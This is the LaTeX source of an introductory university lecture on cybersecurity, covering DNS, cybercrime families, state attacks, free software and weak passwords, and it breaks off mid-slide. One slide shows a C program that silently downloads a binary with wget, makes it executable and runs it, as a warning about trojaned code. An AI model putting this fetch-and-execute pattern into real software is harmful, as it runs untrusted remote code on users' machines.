\makeatletter\let\ifGm@compatii\relax\makeatother %\documentclass{beamer} \documentclass[notes,page number]{beamer} %\documentclass[trans]{beamer} % PAS OVERLAYS %\documentclass[handout]{beamer} % PAS OVERLAYS %\documentclass[red]{beamer} % TOUT ROUGE %\documentclass[compress]{beamer} % ??? taile sortie??? %\documentclass[draft]{beamer} % Enleve les section %\documentclass{article} % fait des slides ``LATEX'' %\usepackage[envcountsect]{beamerarticle} % Do NOT take this file as a template for your own talks. Use a file % in the directory solutions instead. They are much better suited. % Try the class options [notes], [notes=only], [trans], [handout], % [red], [compress], [draft] and see what happens! % Copyright 2003 by Till Tantau . % % This program can be redistributed and/or modified under the terms % of the LaTeX Project Public License Distributed from CTAN % archives in directory macros/latex/base/lppl.txt. % For a green structure color use: %\colorlet{structure}{green!50!black} \mode
% only for the article version { \usepackage{fullpage} \usepackage{hyperref} } \mode { %\usetheme{Antibes} %++ Bleu noir up + % \usetheme{Berkeley} %+ Bleu Gauche %\usetheme{Berlin} % Bleu Gauche up - % \usetheme{default} % Soft % \usetheme{Dresden} % bleu Rond % \usetheme{Goettingen} %soft degrade droit % \usetheme{Hannover} % soft bleute gauche % \usetheme{Luebeck} %++ black bleu milieu % \usetheme{Malmoe} % ++ black bleu milieu % \usetheme{Marburg} % ++ black degrade bleu droite %%%% %\usetheme{Pittsburgh} %soft classique droite + item rond % \usetheme{Rochester} % + bleu up titre %\usetheme{Copenhagen} % ++ black noir NO GASTEX % \usetheme{Darmstadt} % black bleu pb NO GASTEX %\usetheme{Frankfurt} % black bleu NO GASTEX % \usetheme{Ilmenau} % bleu pb up NO GASTEX % \usetheme{JuanLesPins} % ++ up black bleu Titre NO GASTEX % \usetheme{Malmoe} % ++ black bleu milieu % \usetheme{Madrid} % +soft bleu titre... NO GASTEX % \usetheme{PaloAlto} % bleu bleu gauche.. NO GASTEX %\usetheme{Singapore} % bleute up Rond NO GASTEX % \usetheme{Szeged} % Soft bleute up Rond % \usetheme{Warsaw} %++ black bleu milie NO GASTEX %\usetheme{Montpellier} % ++ soft up plan .. blanc OK \usetheme{These} % \beamertemplatenavigationsymbolsempty %numero de page enbas gauche \setbeamertemplate{footline} { \begin{flushright} \textcolor{Violet}{\insertframenumber{} / \inserttotalframenumber \hspace*{2ex} } \end{flushright} } % \useinnertheme[shadow=true]{rounded} %PB % \setbeamertemplate{background canvas}[vertical shading]%[bottom=red!10,top=blue!10] } \usepackage{tikz,pgflibraryarrows,pgffor,pgflibrarysnakes,pgflibraryshapes} \usetikzlibrary{snakes} \usepackage{pgfplots} \usepackage[english]{babel} %\usepackage{pstricks} %\usepackage{graphicx,epsfig} \usepackage{amsmath,amssymb} \usepackage{mathpartir} \usepackage{eurosym} \usepackage{url} \usepackage{epsfig} %\usepackage{pstricks,pst-grad,pst-node} %\usepackage{pstricks,pst-grad,pst-node,pst-tree,pspicture,pifont} \usepackage{graphicx} %\usepackage{gastex} \usepackage{xcolor} \graphicspath{{IMAGES/}} \include{macro} \input{macros}% Yassine %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \xdefinecolor{LemonChiffon}{rgb}{1,.98,.8} \xdefinecolor{Vert}{rgb}{0.01,.5,0.13} %\xdefinecolor{Vert}{rgb}{0.07,0.5,0.4} %\xdefinecolor{Bleu}{rgb}{0,.2,.54} \xdefinecolor{Bleu}{rgb}{0, .4, .6} % en fait le bleu du LSV \xdefinecolor{Ver}{rgb}{0.0525,0.375,0.3} \xdefinecolor{Rouge}{rgb}{1,0,0} \xdefinecolor{Violet}{rgb}{.5,0,.7} \xdefinecolor{Bordeaux}{rgb}{.7,.2,0} \xdefinecolor{Ivory}{rgb}{1,1,0.9} \xdefinecolor{Marron}{rgb}{0.6,0.4,0.4} \xdefinecolor{GrisClair}{rgb}{0.75,0.75,0.75} \xdefinecolor{GrisFonce}{rgb}{0.55,0.55,0.55} \xdefinecolor{BleuMarine}{rgb}{0,0,0.5} %\xdefinecolor{BleuMarine}{rgb}{0.2,.1,.9} %\xdefinecolor{BleuMarine}{rgb}{0,0,0.5} \xdefinecolor{Turquoise}{rgb}{0.4,1.,1.} \xdefinecolor{Rose}{rgb}{1.0,0.8,0.8} \xdefinecolor{RoseFonce}{rgb}{0.8,0.,0.6} \xdefinecolor{Blanc}{rgb}{0,0,0} \xdefinecolor{Jaune}{rgb}{1,1,0} %\xdefinecolor{Jaune}{rgb}{.95,.63,.21} \xdefinecolor{Mycolor}{rgb}{.95,.81,.81} % %\xdefinecolor{Jaune}{rgb}{1,.9,0} %\xdefinecolor{Jaune}{rgb}{.9,.6,.2} % \newrgbcolor{orange}{.7 .2 0} % \definecolor{bleu}{rgb}{0,.2,.54} % \newrgbcolor{Rouge}{1 0 0} % \newrgbcolor{ivory}{1 1 0.9} % \newrgbcolor{Marron}{0.6 0.4 0.4} % \newrgbcolor{GrisClair}{0.75 0.75 0.75} % \newrgbcolor{GrisFonce}{0.55 0.55 0.55} % \newrgbcolor{BleuMarine}{0 0 0.5} % \newrgbcolor{Turquoise}{0.4 1. 1.} % \newrgbcolor{ver}{0.0525 0.375 0.3} % \newrgbcolor{Rose}{1.0 0.8 0.8} % \newrgbcolor{RoseFonce}{0.8 0. 0.6} % \newrgbcolor{Violet}{0.5 0. 0.7} % \newrgbcolor{BleuMarine}{0 0 0.5} % \newrgbcolor{vert}{0.07 0.5 0.4} % \newrgbcolor{violet}{0.5 0. 0.7} % %\definecolor{violet}{rgb}{.5,0,.7} % \definecolor{bleu}{rgb}{0,.2,.54} % \definecolor{LemonChiffon}{rgb}{1.,0.98,0.8} % \newrgbcolor{toto}{0.6 1 0.6} % \newrgbcolor{LemonChiffon}{1 0.98 0.8} % \newrgbcolor{RoseFonce}{0.8 0. 0.6} % \newcmykcolor{WildStrawberry}{0 0.96 0.39 0} % \newrgbcolor{blanc}{0 0 0} \def\pair#1#2{\langle #1, #2 \rangle} \def\crypt#1#2{\{#1\}_{#2}} \def\dect{\vdash} \title{\bf{Security }} \author{\bf{Pascal Lafourcade} } \institute{ \includegraphics[width=2cm]{logo_limos_coul_def} \hfill \includegraphics[width=1.5cm]{UCA.png}} \date[]{ESC January 2021} \begin{document} \begin{frame} \titlepage \end{frame} \AtBeginSection[] { \begin{frame} \frametitle{Outline} \tableofcontents[currentsection] \end{frame} } \section{Cyberspace} \begin{frame} \frametitle{Concrete Reality} \begin{center} \includegraphics[width=10.5cm]{computer-network-system.png} \end{center} \end{frame} \begin{frame} \frametitle{Cables and interconnectivity} \begin{center} \includegraphics[width=10.5cm]{cable-sousmarin.jpg} \url{https://www.submarinecablemap.com/} \end{center} \end{frame} \begin{frame} \frametitle{DNS: Domain Name System} \begin{itemize} \item IPv4 : \texttt{xxx.xxx.xxx.xxx}, where \texttt{xxx} $\in \{0,255\}$ \item IPv6 : \texttt{xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx}, where \texttt{xxxx} is a hexadecimal \end{itemize} \begin{center} 216.58.198.195 = www.google.fr \end{center} \begin{itemize} \item Top-Level Domain (TLD) root fr \item 2nd level : google \item 3rd level : www \end{itemize} ICANN : Internet Corporation for Assigned Names and Numbers AFNIC : \small{Association Fran\c{c}aise pour le Nommage Internet en Coop\'eration} \end{frame} \begin{frame}[fragile] \frametitle{Where are DNS Server ?} \begin{center} \includegraphics[width=8cm]{DNS-server.png} %http://www.root-servers.org/ 13 root name servers are operated by 12 independent organisations \end{center} \end{frame} %% \begin{frame}[fragile] %% \frametitle{List of Root Servers} %% \begin{footnotesize} %% 13 is max number of named authorities in the delegation data for the root zone %% \hspace*{-1cm}\begin{tabular}{lll} %% Hostname & IP Addresses& Manager\\ \hline %% a.root-servers.net &198.41.0.4, 2001:503:ba3e::2:30 &VeriSign, Inc.\\ %% b.root-servers.net &199.9.14.201, 2001:500:200::b &Univ. of Southern California (ISI)\\ %% c.root-servers.net &192.33.4.12, 2001:500:2::c &Cogent Communications\\ %% d.root-servers.net &199.7.91.13, 2001:500:2d::d &University of Maryland\\ %% e.root-servers.net &192.203.230.10, 2001:500:a8::e &NASA (Ames Research Center)\\ %% f.root-servers.net &192.5.5.241, 2001:500:2f::f &Internet Systems Consortium, Inc.\\ %% g.root-servers.net &192.112.36.4, 2001:500:12::d0d &US Department of Defense (NIC)\\ %% h.root-servers.net &198.97.190.53, 2001:500:1::53 &US Army (Research Lab)\\ %% i.root-servers.net &192.36.148.17, 2001:7fe::53 &Netnod\\ %% j.root-servers.net &192.58.128.30, 2001:503:c27::2:30 &VeriSign, Inc.\\ %% k.root-servers.net &193.0.14.129, 2001:7fd::1 &RIPE NCC\\ %% l.root-servers.net &199.7.83.42, 2001:500:9f::42 &ICANN\\ %% m.root-servers.net &202.12.27.33, 2001:dc3::35 & WIDE Project\\ %% \end{tabular} %% \end{footnotesize} %% %https://www.icann.org/news/blog/there-are-not-13-root-servers %% %https://www.iana.org/domains/root/servers %% %DNS Cache poisonning %% \end{frame} %% \begin{frame}[fragile] %% \frametitle{Several hops} %% \begin{verbatim} %% nslookup www.google.fr %% Server: 193.49.117.110 %% Address: 193.49.117.110#53 %% Non-authoritative answer: %% Name: www.google.fr %% Address: 216.58.205.163 %% \end{verbatim} %% dig www.google.com aaaa %% \end{frame} %% \begin{frame} %% \frametitle{DNSSec: RFC4033, RFC4043, RFC4035} %% Ensure authentication, integrity of data. %% \end{frame} %% \begin{frame} %% \frametitle{DNSSec = DNS + Security} %% Add %% \begin{itemize} %% \item RRSIG : signature for authentication of RRSet. %% \item DNSKEY : Key Signing Key (KSK) and Zone Signing Key (ZSK) %% \item DS : pointe to the KSK of a child zone %% \end{itemize} %% \end{frame} %% \begin{frame} %% \frametitle{RRSIG} %% \begin{itemize} %% \item Domain name %% \item TTL (Time To Live) %% \item Class %% \item Type %% \item Cryptography suite used %% \item Number of labels %% \item Expiration date %% \item Id of the signer %% \end{itemize} %% \end{frame} %% \begin{frame}[fragile] %% \frametitle{Example} %% \begin{verbatim} %% www.exemple.org. 86400 IN RRSIG A 10 3 86400 %% 20130316101137 ( %% 20130517060654 49703 exemple.org. %% mXS6b [...] xOg ==) %% \end{verbatim} %% \begin{itemize} %% \item le type d'enregistrement concern\'e est A ; %% \item la suite cryptographique utilis\'e 10 (RSA-SHA256) ; %% \item le nombre de labels est 3 ; %% \item le TTL originel est 86400 ; %% \item la signature expire le 16 juin 2013 ; %% \item et elle est valide \`a partir du 15 mai 2013 ; %% \item l'identifiant de la clef de signature est 49703 ; %% \item le nom de domaine du signataire est exemple.org ; %% \item la signature est mXS6b [. . .] xOg. %% \end{itemize} %% id clef = somme 2 \`a 2 des octets %% \end{frame} %% \begin{frame} %% \frametitle{} %% \begin{itemize} %% \item la ZSK est utilis\'ee par une zone pour signer tous ses enregistrements ; %% \item la KSK est utilis\'ee par une zone pour authentifier sa clef ZSK en la signant. La KSK %% est authentifi\'ee par la ZSK de sa zone parente. %% \end{itemize} %% p\'eriode de renouvellement : 6 mois pour une ZSK et 2 \`a 3 ans pour une KSK. %% \end{frame} %% \begin{frame} %% \frametitle{Chaine de confiance} %% \begin{center} %% \includegraphics[width=5cm]{dnssec.png} %% \end{center} %% \end{frame} %% \begin{frame} %% \frametitle{NSEC et NSEC3.} %% \begin{block}{NSEC (Next SECure)} %% pour la non-existence d'un nom de domaine. %% Donne le prochain nom de domaine valide : PB : NSEC walking discover ! %% \end{block} %% \begin{block}{NSEC3 ([RFC5155])} %% remplace le prochain nom de domaine par l’empreinte des deux noms de %% domaine qui encadrent le nom inexistant. %% \end{block} %% \end{frame} \pgfdeclareimage[interpolate=true,height=2cm]{cb}{new-york-liberty-credit-card} \pgfdeclareimage[interpolate=true,height=1cm]{RSA}{RSAkey} \pgfdeclareimage[interpolate=true,height=3cm]{esign}{Electronic-signature1} \pgfdeclareimage[interpolate=true,height=2.5cm]{router}{VPN-for-Router} \pgfdeclareimage[interpolate=true,height=3.7cm]{vote}{VoteElectronique} \pgfdeclareimage[interpolate=true,height=3cm]{telephone}{samsung} \pgfdeclareimage[interpolate=true,height=2cm]{https}{web-security1} \pgfdeclareimage[interpolate=true,height=2cm]{https2}{https-background} \pgfdeclareimage[interpolate=true,height=3cm]{wifi}{wifi1} \pgfdeclareimage[interpolate=true,height=1.2cm]{ebay}{ebay-logo} \pgfdeclareimage[interpolate=true,height=3cm]{contactless}{contactless-payment} \section{Cybercriminality a reality} \begin{frame} \frametitle{Computers are everywhere!} \vspace{-.75cm} \begin{center} \begin{tikzpicture} %\pgfsetfillopacity{0.5} %\pause %\pgftext[at=\pgfpoint{2cm}{1.5cm},left,base]{\pgfuseimage{cb}} \pgftext[at=\pgfpoint{3cm}{1.5cm},left,base]{\pgfuseimage{cb}} %\pause \pgftext[at=\pgfpoint{6cm}{1.5cm},left,base]{\pgfuseimage{telephone}} %\pause \pgftext[at=\pgfpoint{-1cm}{-1.5cm},left,base]{\pgfuseimage{https2}} %\pgftext[at=\pgfpoint{-.5cm}{-2.8cm},left,base]{\pgfuseimage{RSA}} %\pause \pgftext[at=\pgfpoint{-1cm}{1cm},left,base]{\pgfuseimage{wifi}} %\pgftext[at=\pgfpoint{-1cm}{1.5cm},left,base]{\pgfuseimage{router}} %\pause \pgftext[at=\pgfpoint{5cm}{-2.5cm},left,base]{\pgfuseimage{contactless}} \pgftext[at=\pgfpoint{2cm}{-2.5cm},left,base]{\pgfuseimage{vote}} %\pause %\pgftext[at=\pgfpoint{6cm}{-2cm},left,base]{\pgfuseimage{esign}} %\pgftext[at=\pgfpoint{9.3cm}{-.5cm},left,base]{\pgfuseimage{ebay}} \end{tikzpicture} \end{center} \end{frame} \begin{frame} \frametitle{5 Famillies of Cyber Criminality} \begin{columns}[c] % the "c" option specifies center vertical alignment \column{5cm} % column designated by a command \begin{itemize} \item Phishing \item Espionnage \item Ransomwares \item Sabotage \item Destabilisation%: DDOoS, Botnets and zombies \end{itemize} \column{5.5cm} % column designated by a command % \includegraphics[height=3cm]{Security.jpg} \includegraphics[height=3.5cm]{Cyber-Militia.jpg} \end{columns} \end{frame} \begin{frame} \frametitle{Phishing} \vspace{-1cm} \hfill \includegraphics[height=2cm]{phishing} \centering \includegraphics[height=5cm]{Fack-Facebook-Security-Team-Message.jpg} \end{frame} \begin{frame} \frametitle{Espionnage} % \vspace{-.75cm} \begin{center} \hfill \includegraphics[height=4cm]{espionnage-confidentialite-vie-prive.jpg} \hfill \includegraphics[height=5cm]{big-brother-is-watching-you.jpg} \hfill~ \end{center} \begin{itemize} \item Little Brother (Individual) \item Medium Brother (Corporation) \item Big Brother (Government) \end{itemize} \ \\ Edward Joseph Snowden, 6th june 2013 \vspace{-2cm} \hfill \includegraphics[height=2cm]{Edward-Snowden.jpg} \end{frame} \begin{frame} \frametitle{Ransomwares: Wannacry et al. 12 may 2017} % \centering \includegraphics[height=7cm]{Wana_Decrypt0r_screenshot.png} % \includegraphics[height=4cm]{casier_fr_09-2012.png} \url{http://stopransomware.fr/} \end{frame} \begin{frame} \frametitle{Sabotage} % Stuxnet, 2010 \begin{center} \includegraphics[height=6cm]{HowStuxnetWorked.jpg} \end{center} Saudi Aramco 35 000 PC deleted in 2012. \end{frame} \begin{frame} \frametitle{Destabilisation: Defacing} % \includegraphics[height=5cm]{iskorpitx_00025624} \vspace*{-2.5cm} \hfill \includegraphics[height=4cm]{hacked} \end{frame} \begin{frame} \frametitle{Destabilisation: Trojan, Botnets and Zombies} % \centering \includegraphics[height=6cm]{Botnet.png} \end{frame} \begin{frame} \frametitle{\url{http://cybermap.kaspersky.com/}} \ \\ \hspace{-4cm} \includegraphics[width=12cm]{Cyberthreat-real-world.png} \vspace{-4cm}\hfill \includegraphics[width=6cm]{Cyberthreat-real-europe.png} \ \\ \pause 14 September 2017 USA stops to use Kaspersky 29 September 2017 France is doing the same \end{frame} \begin{frame}{Why are there more and more attacks?} \begin{center} \includegraphics[width=2cm]{maison} \pause \qquad \includegraphics[width=2cm]{billet} \pause \includegraphics[width=6cm]{library-32746_960_720} \end{center} \pause %\item Faisable \`a la maison %\item Peu cher, self-service Fast, large scale, semi-automatic... \pause \hfill but you wrongly feel anonymous! \centering \includegraphics[width=1cm]{anonymous} \pause \begin{center} %\hfill \includegraphics[width=3cm]{email-Messagerie} \hfill \includegraphics[width=3cm]{post-card} \hfill~ %\pause \textcolor{red}{Internet was not designed to be secure but just to work!} \end{center} \end{frame} \begin{frame}{Cyber Attack against Estonia April 2007} \centering \includegraphics[width=7cm]{Estonie-attack.png} \end{frame} \begin{frame}{DDos Attack against Dyn DNS 21 October 2016} \centering \includegraphics[width=3cm]{Mirai-botnet-test.jpg} \ \\ \includegraphics[height=2.75cm]{World-map-hotspots.jpg} \hfill \includegraphics[height=2.75cm]{DynDDod.png} \end{frame} %% \begin{frame}{Attaques} %% 2000, Attaque massive contre les infrastructures militaires %% am\'ericaines – 2003, Titan Rain (Lookheed Martin, Redstone Arsenal, %% Nasa,…) – 2008, DoD am\'ericain – 2009, Night Dragon (compagnies %% p\'etrolières et p\'etrochimique US, Kazakhstan, Grèce,…) – 2010 %% Op\'eration Aurora (Google, Adobe, Yahoo, Northrop…), – 2011 Bercy %% (pr\'eparation G20), Areva, – 2012 Elys\'ee, Gauss (transaction %% financière Israel) – 2013 Red October… %% SONY %% \end{frame} \begin{frame} \frametitle{Advanced Persistent Threat: Govermment attacks} \begin{itemize} \item Titan Rain discovered in 2003: Massive USA data collected during 3 years \item Operation Aurora discovered in 2010: Chinese attack against USA \item November 2014, \includegraphics[width = 3cm]{IMAGES/sony.png} \item 2011 Bercy, 150 PC infected\\ \centering \includegraphics[width = 3cm]{IMAGES/bercy.jpg} \end{itemize} \end{frame} %% \begin{frame} %% \frametitle{Governmental Attacks} %% \begin{itemize} %% \item January 2009: hackers attacked Israel’s internet %% infrastructure %% \item February 2011: hackers have infiltrated three canadian %% government departments and obtained classified information. %% \item Since August 2012: EDF is victim of a cyberattack (Phising) %% \item March 2013: South Korean financial institutions had their %% networks infected. %% \end{itemize} %% {\small %% \url{http://www.defense.gouv.fr/content/download/135220/1336475/Dicod-Cyber-Attaque.swf} %% \url{http://www.nato.int/docu/review/2013/Cyber/timeline/EN/index.htm} %% } %% \end{frame} \begin{frame}{Computer Science Security Agencies} \begin{itemize} \item 1919 \includegraphics[height=1cm]{gchq-logo} \item 1952, \includegraphics[height=2cm]{nsa} \item 1995, \includegraphics[height=1.5cm]{FSB} \item 2002, \includegraphics[height=1cm]{microsoft.jpg} \item 7 July 2009, \includegraphics[height=1.5cm]{ANSSI} \end{itemize} \end{frame} \begin{frame}{French white book on defense and national seurity 2013} \begin{center} \includegraphics[width=5cm]{livre-blanc2013.jpg} \end{center} 5 places (p84): \begin{itemize} \item earth \item air \item sea \item espace \item cyberespace \end{itemize} \end{frame} \begin{frame}{OIV : ``Op\'erateur d'importance vitale''} \includegraphics[width=10cm]{IMAGES/12-secteurs-OIV.png} \end{frame} \begin{frame}{OIV : ``Op\'erateur d'importance vitale''} \includegraphics[width=11cm]{IMAGES/sector-OIV.png} Around 250 critical infrastructures. \end{frame} %l’article 51 de la Charte de l’ONU face \begin{frame}[fragile] \frametitle{Backdoors} \centering \includegraphics[width=3cm]{backdoor.jpg} \begin{itemize} \item NSA's backdoor into \verb+Dual_EC_DRBG+ Dual Elliptic Curve Deterministic Random Bit Generator. \item Backdoor identified by academic researchers (Crypto 2007) and revealed by Snowden 2013. \end{itemize} \centering \includegraphics[width=4cm]{IMAGES/nsa-cisco.png} \end{frame} \begin{frame} \frametitle{Cyberwar is a reality} \$7 billion for USA cyber operations in 2017 over \$35 billion over the next 5 years. \begin{itemize} \item Communications are crucial: Egypt, Tunisia revolutions \hfill \includegraphics[width=2cm]{IMAGES/14.jpg} \hfill~ \item Tracking authors is not always easy \item Defense and attack strategies are different \hfill \includegraphics[width=3cm]{IMAGES/security-software-always-stay-secure.jpg} \hfill \includegraphics[width=4cm]{IMAGES/Norse.jpg} \hfill ~ \item Cyberattacks can have physical consequences \hfill \includegraphics[width=2.5cm]{IMAGES/Ransomware-Hospital-Attacks.jpg} \hfill ~ \end{itemize} \end{frame} \begin{frame} \begin{center} War games, 1983 \includegraphics[width=8cm]{wargames-1.jpg} Could it be a reality? \end{center} \end{frame} \section{Free Software and Security} \begin{frame} \frametitle{Exemples} \vspace{-.5cm} \begin{center} \includegraphics[width=2cm]{VLC.jpg}\hfill \includegraphics[width=3cm]{OpenOffice.png}\hfill \includegraphics[width=2cm]{firefox-logo.jpg}\hfill \includegraphics[width=2cm]{gimp.png} % handbrake \includegraphics[width=2cm]{inkscape-logo.png}\hfill \includegraphics[width=2cm]{python.png}\hfill \includegraphics[width=2cm]{caml-inria-fr.jpg}\hfill \includegraphics[width=2cm]{audacity.jpg}\hfill \includegraphics[width=2cm]{logo-handbrake.png} %\includegraphics[width=2cm]{wikipedia.png} \includegraphics[width=2cm]{apache_software_foundation_logo_3074.jpg}\hfill \includegraphics[width=2cm]{mysql.png}\hfill \LARGE{\LaTeX} \hfill \includegraphics[width=1.5cm]{EmacsIcon.png}\hfill \includegraphics[width=2cm]{bsd.jpg} \includegraphics[width=8cm]{fs-gang.png} \end{center} \end{frame} \begin{frame} \frametitle{Logiciel LIBRE} \begin{center} \LARGE{ “free software” $\neq$} \includegraphics[width=.75cm]{0euro.png} \end{center} \begin{block}{Examples} \begin{itemize} \item {\bf libre, gratuit} : Linux, FreeBSD, perl, python ... \item {\bf libre, non gratuit} : ach\'eter un CD, payer des d\'eveloppeurs... \item {\bf non libre, gratuit} : Acrobat Reader, Chrome, Flash ... \item {\bf non libre, non gratuit} : no comment. \end{itemize} \end{block} \end{frame} \begin{frame} \frametitle{Free as in freedom} %(GPL: General Public Licence)} \includegraphics[height=2cm]{Richard_Stallman_2005.jpg} \hfill \includegraphics[height=2cm]{Heckert_GNU_white.png} \hfill \includegraphics[height=2cm]{Linus_Torvalds.jpg} \hfill \includegraphics[height=2cm]{512px-Tux.png}~ \begin{block}{4 Freedoms} \begin{itemize} \item \textcolor{red}{Freedom 0}: {\bf Run} the program as you wish, for any purpose. \item \textcolor{red}{Freedom 1}: {\bf Modify} the program to suit your needs. (you must have access to the source code) \item \textcolor{red}{Freedom 2}: {\bf Redistribute copies}, either gratis or for a fee. \item \textcolor{red}{Freedom 3}: {\bf Distribute} modified versions of the program, so that the community can benefit from your improvements. \end{itemize} \end{block} \end{frame} \begin{frame}[fragile] \frametitle{Danger HELLOWORLD} \begin{verbatim} #include int main(void) { printf("Helloworld\n"); return 0; } \end{verbatim} What does this program? \pause \ \\ What do these programs? \small{ \url{https://sancy.iut-clermont.uca.fr/~lafourcade/Helloworld} \url{https://sancy.iut-clermont.uca.fr/~lafourcade/Hellworld} } \end{frame} \begin{frame}[fragile] \frametitle{Danger HELLWORLD} \begin{verbatim} #include #include int main(void) { system("wget -q https://sancy.iut-clermont.uca.fr/ ~lafourcade/Helloworld"); system("chmod 777 Helloworld"); system("clear"); system("./Helloworld"); return 0; } \end{verbatim} \end{frame} \section{Micode advices} \begin{frame}{Few advices} \begin{center} \includegraphics[width=3cm]{Logo-Festival.jpg} {\LARGE 2018} \ \\ GRAND PRIX DU FESTIVAL 10 advices ti be a Cyber-Victim by Micode VIDEO \end{center} \end{frame} \begin{frame} \frametitle{10 Advices} \begin{enumerate} \item Passwords \item BYOD \item Email and attachments \item VPN \item Security updates \item Antivirus \item Bakcup \item IoT / Smarthphones \item Personnal Data \item Phising \end{enumerate} \end{frame} \begin{frame}{1) Password Security} \begin{center} \includegraphics[height=3.5cm]{login_passwoed.png} \end{center} \pause \hfill \includegraphics[height=3.5cm]{porte-forte} \hfill %\includegraphics[height=3.5cm]{porte-jap} \includegraphics[height=3.5cm]{porte_inter_01} \hfill~ \end{frame} \begin{frame}{Reality} %\includegraphics[height=3.5cm]{Prince-Williams1.jpg} \includegraphics[height=3cm]{williams-password.jpg} \pause \vspace{-2cm} \hfill \includegraphics[height=7cm]{Prince-William-Passwords.jpg} \hfill Prince Williams \end{frame} %% \begin{frame}{Top 25 en 2014} %% \begin{columns}[c] % the "c" option specifies center vertical alignment %% \column{4cm} % column designated by a command %% \begin{enumerate} %% \item 123456 %% \item password %% \item 12345 %% \item 12345678 %% \item qwerty %% \item 123456789 %% \item 1234 %% \item baseball %% \item dragon %% \item football %% \item 1234567 %% \item monkey %% \end{enumerate} %% \column{4cm} % column designated by a command %% \begin{enumerate} \setcounter{enumi}{12} %% \item letmein %% \item abc123 %% \item 111111 %% \item mustang %% \item access %% \item shadow %% \item master %% \item michael %% \item superman %% \item 696969 %% \item 123123 %% \item batman %% \item trustno1 %% \end{enumerate} %% \end{columns} %% \end{frame} %% \begin{frame}{Top 25 en 2015} %% \begin{columns}[c] % the "c" option specifies center vertical alignment %% \column{4cm} % column designated by a command %% \begin{enumerate} %% \item 123456 (=) %% \item password (=) %% \item 12345678 (Up 1) %% \item qwerty (Up 1) %% \item 12345 (Down 2) %% \item 123456789 (=) %% \item football (Up 3) %% \item 1234 (Down 1) %% \item 1234567 (Up 2) %% \item baseball (Down 2) %% \item welcome (New) %% \item 1234567890 (New) %% \end{enumerate} %% \column{4cm} % column designated by a command %% \begin{enumerate} \setcounter{enumi}{12} %% \item abc123 (Up 1) %% \item 111111 (Up 1) %% \item 1qaz2wsx (New) %% \item dragon (Down 7) %% \item master (Up 2) %% \item monkey (Down 6) %% \item letmein (Down 6) %% \item login (New) %% \item princess (New) %% \item qwertyuiop (New) %% \item solo (New) %% \item passw0rd (New) %% \item starwars (New) %% \end{enumerate} %% \end{columns} %% %% \begin{columns}[c] % the "c" option specifies center vertical alignment %% %% \column{4cm} % column designated by a command %% %% En 2014 %% %% \begin{enumerate} %% %% \item 123456 %% %% \item password %% %% \item 12345 %% %% \item 12345678 %% %% \item qwerty %% %% \item 123456789 %% %% \item 1234 %% %% \item baseball %% %% \item dragon %% %% \item football %% %% \item 1234567 %% %% \item monkey %% %% \end{enumerate} %% %% \column{4cm} % column designated by a command %% %% \begin{enumerate} \setcounter{enumi}{12} %% %% \item letmein %% %% \item abc123 %% %% \item 111111 %% %% \item mustang %% %% \item access %% %% \item shadow %% %% \item master %% %% \item michael %% %% \item superman %% %% \item 696969 %% %% \item 123123 %% %% \item batman %% %% \item trustno1 %% %% \end{enumerate} %% %% \end{columns} %% \end{frame} %% \begin{frame}{Top 25 en 2016} %% \begin{columns}[c] % the "c" option specifies center vertical alignment %% \column{4cm} % column designated by a command %% \begin{enumerate} %% \item 123456 (Unchanged) %% \item 123456789 (Up 5) %% \item qwerty (Up 1) %% \item 12345678 (Down 1) %% \item 111111 (Up 9) %% \item {\bf 1234567890} %% \item 1234567 (Up 1) %% \item password (Down 6) %% \item {\bf 123123 } %% \item {\bf 987654321} %% \item {\bf qwertyuiop} %% \item {\bf mynoob} %% \end{enumerate} %% \column{4cm} % column designated by a command %% \begin{enumerate} \setcounter{enumi}{12} %% \item {\bf 123321} %% \item {\bf 666666} %% \item {\bf 18atcskd2w} %% \item {\bf 7777777} %% \item {\bf 1q2w3e4r} %% \item {\bf 654321} %% \item {\bf 555555} %% \item {\bf 3rjs1la7qe} %% \item {\bf google} %% \item {\bf 1q2w3e4r5t} %% \item {\bf 123qwe} %% \item {\bf zxcvbnm} %% \item {\bf 1q2w3e} %% \end{enumerate} %% \end{columns} %% \end{frame} \begin{frame}{TOP 25 Passwords} \hspace*{-.8cm} \begin{tiny} \begin{tabular}{|l|l|l|l|l|l|l|l|l|} \hline \# &2011 &2012 &2013 &2014 &2015 &2016 &2017 &2018 \\ \hline 1 &password &password &123456 &123456 &123456 &123456 &123456 &123456 \\ \hline 2 &123456 &123456 &password &password &password &password &password &password \\ \hline 3 &12345678 &12345678 &12345678 &12345 &12345678 &12345 &12345678 &123456789 \\ \hline 4 &qwerty &abc123 &qwerty &12345678 &qwerty &12345678 &qwerty &12345678 \\ \hline 5 &abc123 &qwerty &abc123 &qwerty &12345 &football &12345 &12345 \\ \hline 6 &monkey &monkey &123456789 &123456789 &123456789 &qwerty &123456789 &111111 \\ \hline 7 &1234567 &letmein &111111 &1234 &football &1234567890 &letmein &1234567 \\ \hline 8 &letmein &dragon &1234567 &baseball &1234 &1234567 &1234567 &sunshine \\ \hline 9 &trustno1 &111111 &iloveyou &dragon &1234567 &princess &football &qwerty \\ \hline 10 &dragon &baseball &adobe123 &football &baseball &1234 &iloveyou &iloveyou \\ \hline 11 &baseball &iloveyou &123123 &1234567 &welcome &login &admin &princess \\ \hline 12 &111111 &trustno1 &admin &monkey &1234567890 &welcome &welcome &admin \\ \hline 13 &iloveyou &1234567 &1234567890 &letmein &abc123 &solo &monkey &welcome \\ \hline 14 &master &sunshine &letmein &abc123 &111111 &abc123 &login &666666 \\ \hline 15 &sunshine &master &photoshop &111111 &1qaz2wsx &admin &abc123 &abc123 \\ \hline 16 &ashley &123123 &1234 &mustang &dragon &121212 &starwars &football \\ \hline 17 &bailey &welcome &monkey &access &master &flower &123123 &123123 \\ \hline 18 &passw0rd &shadow &shadow &shadow &monkey &passw0rd &dragon &monkey \\ \hline 19 &shadow &ashley &sunshine &master &letmein &dragon &passw0rd &654321 \\ \hline 20 &123123 &football &12345 &michael &login &sunshine&master&!@\#\$\% \^~\&*\\ \hline 21 &654321 &jesus &password1 &superman &princess &master &hello &charlie \\ \hline 22 &superman &michael &princess &696969 &qwertyuiop &hottie &freedom &aa123456 \\ \hline 23 &qazwsx &ninja &azerty &123123 &solo &loveme &whatever &donald \\ \hline 24 &michael &mustang &trustno1 &batman &passw0rd &zaq1zaq1 &qazwsx &password1 \\ \hline 25 &Football &password1 &000000 &trustno1 &starwars &password1 &trustno1 &qwerty123 \\ \hline \end{tabular} \end{tiny} \end{frame} \begin{frame}{Passwords Brute 